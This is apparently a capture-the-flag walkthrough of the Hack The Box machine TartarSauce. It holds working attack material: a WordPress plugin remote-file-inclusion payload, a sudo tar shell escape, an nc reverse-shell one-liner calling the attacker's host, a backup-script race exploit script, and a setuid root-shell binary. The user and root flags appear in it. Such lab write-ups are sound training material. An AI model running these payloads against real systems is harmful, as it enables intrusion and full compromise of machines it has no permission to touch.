HTB-TartarSauce

TartarSauce

Target

  1. Capture 2 flags (user and root)

Process

Port Scan

sudo nmap -sS -p- --min-rate=10000 10.10.10.88
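The sweep turns up just port 80, which matches the web-only enumeration below. A default-script and version scan against it is a natural follow-up (standard nmap flags, not part of the original notes):

sudo nmap -sC -sV -p 80 10.10.10.88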

Info collection

Access the website

Going back to enumeration, dirsearch reveals another path, /webservices:

=====================================================
/index.html (Status: 200)
/robots.txt (Status: 200)
/webservices (Status: 301)
=====================================================

Trying to access the /webservices URL just returns a 403 Forbidden, but another round of dirsearch against it reveals a /wp path.
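The second round looks something like this (the exact wordlist is an assumption; any common directory list works):

dirsearch -u http://10.10.10.88/webservices/ -w /usr/share/wordlists/dirb/common.txt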

=====================================================
/wp (Status: 301)
=====================================================

WordPress Site

The website renders broken: page elements fail to load because they reference a hostname rather than the IP.

After inspecting the web elements, we see references to tartarsauce.htb, so we have to add that name to our /etc/hosts file.
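A one-liner does it (the IP/hostname pair comes straight from the request URLs used later):

echo "10.10.10.88 tartarsauce.htb" | sudo tee -a /etc/hosts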


We can now access the site normally. The next step is to find vulnerabilities in this WordPress site.

Wpscan

wpscan is a good tool to enumerate WordPress sites. I'll use the --enumerate t,u,ap and --plugins-detection mixed options to enumerate themes, users, and plugins. The output is quite long, but is snipped here to show that it identifies three plugins:

wpscan  --url http://10.10.10.88/webservices/wp --enumerate t,u,ap  --plugins-detection mixed -t 500

[+] We found 3 plugins:
[+] Name: akismet - v4.0.3
 |  Last updated: 2018-05-26T17:14:00.000Z
 |  Location: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/
 |  Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
[!] The version is out of date, the latest version is 4.0.6
[+] Name: brute-force-login-protection - v1.5.3
 |  Latest version: 1.5.3 (up to date)
 |  Last updated: 2017-06-29T10:39:00.000Z
 |  Location: http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/
 |  Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/readme.txt
[+] Name: gwolle-gb - v2.3.10
 |  Last updated: 2018-05-12T10:06:00.000Z
 |  Location: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/
 |  Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
[!] The version is out of date, the latest version is 2.5.2
[+] Enumerating installed themes (only ones marked as popular) ...
...

Shell as www-data

There's an RFI vulnerability in Gwolle Guestbook v1.5.3 (CVE-2015-8351): ajaxresponse.php passes the abspath parameter straight into a PHP require, appending wp-load.php to it. Visiting http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://ip/path makes the server fetch and execute code from our host.

We can make the victim fetch a PHP reverse shell from our local web server. Because the plugin appends wp-load.php to whatever abspath we supply, the payload has to be reachable at the resulting concatenated URL.
Start a local HTTP server and an nc listener, then request the vulnerable endpoint again.
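A minimal setup (the listener port is an assumption; shell.php stands in for any standard PHP reverse shell pointed back at 10.10.14.11):

sudo python3 -m http.server 80
nc -lvnp 4444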


http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.11/shell.php

Shell as onuma

We get the initial shell as www-data, but we need to escalate privileges. A good first check is sudo -l.

As www-data, we can’t get into the lone user directory:

www-data@TartarSauce:/home$ ls
onuma
www-data@TartarSauce:/home$ cd onuma/
bash: cd: onuma/: Permission denied

Notice that user www-data can run /bin/tar as onuma via sudo with no password:

www-data@TartarSauce:/dev/shm$ sudo -l
Matching Defaults entries for www-data on TartarSauce:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on TartarSauce:
    (onuma) NOPASSWD: /bin/tar

Gtfobins

GTFOBins documents a shell escape for tar: --checkpoint-action=exec runs an arbitrary command whenever tar reaches a checkpoint, so invoking it through sudo hands us a shell as onuma:

sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Get the user flag
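The flag sits in onuma's home directory, per the usual HTB layout:

cat /home/onuma/user.txt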


User flag: b2d6ec45472467c836f253bd170182c7

Privesc onuma → root

Before digging in, we spawn a second reverse shell for fault tolerance, in case the first connection drops:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.11 4446 >/tmp/f &
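On the attacking machine, a matching listener catches it (the port is taken from the command above):

nc -lvnp 4446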



Now we have two interactive shells.

Identify the scheduled job with pspy32

pspy is a process-monitoring tool that lets an unprivileged user watch commands launched by other users. Watching it for a few minutes, we find root periodically running /usr/sbin/backuperer (a systemd timer fires it every five minutes).
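One way to get pspy32 onto the box (download URL and working directory are assumptions):

Local machine:
python3 -m http.server 8000
Victim machine:
cd /dev/shm && wget http://10.10.14.11:8000/pspy32 && chmod +x pspy32 && ./pspy32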

Grab /usr/sbin/backuperer and pull it back to the local machine for analysis:

Local machine:
nc -lp 6000 > backuperer
Victim machine:
nc <ip> 6000 < /usr/sbin/backuperer
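A checksum on both ends confirms the transfer was clean:

Local machine:
md5sum backuperer
Victim machine:
md5sum /usr/sbin/backuperer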

Understanding the backuperer script

#!/bin/bash
#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up in case another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------
# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check
# formatting
printbdr()
{
    for n in $(seq 72);
    do /usr/bin/printf $"-";
    done
}
bdr=$(printbdr)
# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg
# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check
# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &
# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30
# Test the backup integrity
integrity_chk()
{
    /usr/bin/diff -r $basedir $check$basedir
}
/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
    # Report errors so the dev can investigate the issue.
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran :  $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
else
    # Clean up and save archive to the bkpdir.
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0
fi

I'll break it down into its important steps:
a. Use tar as onuma to take everything in $basedir (/var/www/html) and save it as a gzip archive (-z) named $tmpfile. $tmpfile is /var/tmp/.[random sha1], so we know it will start with a "." and which folder it will be in, but nothing else.

# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

b. Sleep for 30 seconds

/bin/sleep 30

c. Make a temporary directory at /var/tmp/check

/bin/mkdir $check

d. Extract $tmpfile to /var/tmp/check

/bin/tar -zxvf $tmpfile -C $check

e. Run the integrity_chk function. If it produces no output (the extracted files match $basedir), move the temp archive to /var/backups/onuma-www-dev.bak; if it reports differences, run integrity_chk again and append its output to /var/backups/onuma_backup_error.txt.

if [[ $(integrity_chk) ]]
then
    # Report errors so the dev can investigate the issue.
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran :  $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
else
    # Clean up and save archive to the bkpdir.
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0
fi

Exploiting backuperer

Get the root flag

To exploit the script, we'll take advantage of two things: the 30-second sleep and the recursive diff. During the sleep, we can unpack the in-progress archive, replace one of the files with a symlink to /root/root.txt, and re-archive it. When the script then extracts the tampered archive and runs the diff as root, the file differs from the original, and the contents of both files (including the flag) end up in the error log.
I originally did this with a long bash one-liner, but it is easier to follow as a script:

#!/bin/bash
# Author: Kelpie_Banshee
# work out of some directory you are writeable and executable
cd /dev/shm
# set both start and cur equal to any backup file if it's there
start=$(find /var/tmp -maxdepth 1 -type f -name ".*")
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*")
echo "[+] Wait for new file"
while [ "$start" == "$cur" -o "$cur" == "" ] ; do
    sleep 10;
    cur=$(find /var/tmp -maxdepth 1 -type f -name ".*");
done
# Grab the zip in the directory
echo "[+] Copy the zip file to work directory"
cp $cur .
filename=$(echo $cur | cut -d'/' -f4)
# Extract the archive
tar -zxf $filename
# Replace the robots.txt
rm var/www/html/robots.txt
ln -s /root/root.txt var/www/html/robots.txt # Symbolic links
rm $filename
tar czf $filename var
# Put it back, and clean up
mv $filename $cur
rm $filename
rm -rf var
# Wait for the new error log
echo "[+] Waiting for the new error log"
tail -f /var/backups/onuma_backup_error.txt
exit

Now, upload this to the target and run it. I'll name it exp.sh:

./exp.sh
[+] Wait for new file
[+] Copy the zip file to work directory
tar: var/www/html/webservices/monstra-3.0.4/public/uploads/.empty: Cannot open: Permission denied
tar: Exiting with failure status due to previous errors
tar: var/www/html/webservices/monstra-3.0.4/public/uploads/.empty: Cannot stat: Permission denied
tar: Exiting with failure status due to previous errors
rm: cannot remove '.97ac3271d196cc084ec0f2b26df0efe63ff7d73e': No such file or directory
rm: cannot remove 'var/www/html/webservices/monstra-3.0.4/public/uploads/.empty': Permission denied
[+] Waiting for the new error log
< User-agent: *
< Disallow: /webservices/tar/tar/source/
< Disallow: /webservices/monstra-3.0.4/
< Disallow: /webservices/easy-file-uploader/
< Disallow: /webservices/developmental/
< Disallow: /webservices/phpmyadmin/
<
---
> e79abdab8b8a4b64f8579a10b2cd09f9
Only in /var/www/html/webservices/monstra-3.0.4/public/uploads: .empty
tail: inotify resources exhausted
tail: inotify cannot be used, reverting to polling

Root flag: e79abdab8b8a4b64f8579a10b2cd09f9

Get the root shell

We can go further than the flag and get a full root shell by smuggling a setuid binary into the archive.

// Usage: gcc -m32 -o suid suid.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
  // The extracted binary will be setuid root, so euid is already 0;
  // set the real uid to 0 as well so bash keeps the privilege.
  setreuid(0, 0);
  // Launch bash with a proper argv rather than NULL.
  char *args[] = {"/bin/bash", NULL};
  execve(args[0], args, NULL);
  return 0;
}

From the output of uname -a, we have seen that TartarSauce is a 32-bit system, so we compile with -m32 and package the binary:

Local Machine:
sudo apt-get install gcc-multilib
sudo gcc -m32 -o suid suid.c
sudo mkdir -p var/www/html
sudo cp suid var/www/html
sudo chmod 6555 var/www/html/suid
ls -la var/www/html/suid
-r-sr-sr-x 1 root root 15480 Nov  1 16:35 var/www/html/suid
sudo tar -zcvf suid.tar.gz var --owner=root --group=root
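Before sending it over, a quick listing confirms the archive preserved root ownership and the setuid bit:

tar -tvf suid.tar.gz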
Upload suid.tar.gz to the target along with a second script, which waits for backuperer's temp archive to appear and swaps in ours:

#!/bin/bash
# Author: Kelpie_Banshee
# Usage: bash shell.sh
# work out of some directory you are writeable and executable
cd /tmp
# set both start and cur equal to any backup file if it's there
start=$(find /var/tmp -maxdepth 1 -type f -name ".*")
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*")
# loop until an archive file appears
echo "[+] Waiting for archive filename to change"
while [ "$cur" == "" ] ; do
    sleep 10;
    cur=$(find /var/tmp -maxdepth 1 -type f -name ".*");
done
echo "[+] Copy the archive"
echo $cur
# Replace the original archive
cp suid.tar.gz $cur
exit
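When backuperer next runs, it extracts our archive as root into $check; the integrity check then fails (diff flags our suid binary), so the script takes the exit 2 branch and never removes /var/tmp/check. Before the next cycle's cleanup wipes that directory, run the extracted binary (the path follows from $check plus the archive layout we built above):

/var/tmp/check/var/www/html/suid

This drops us into a bash shell as root.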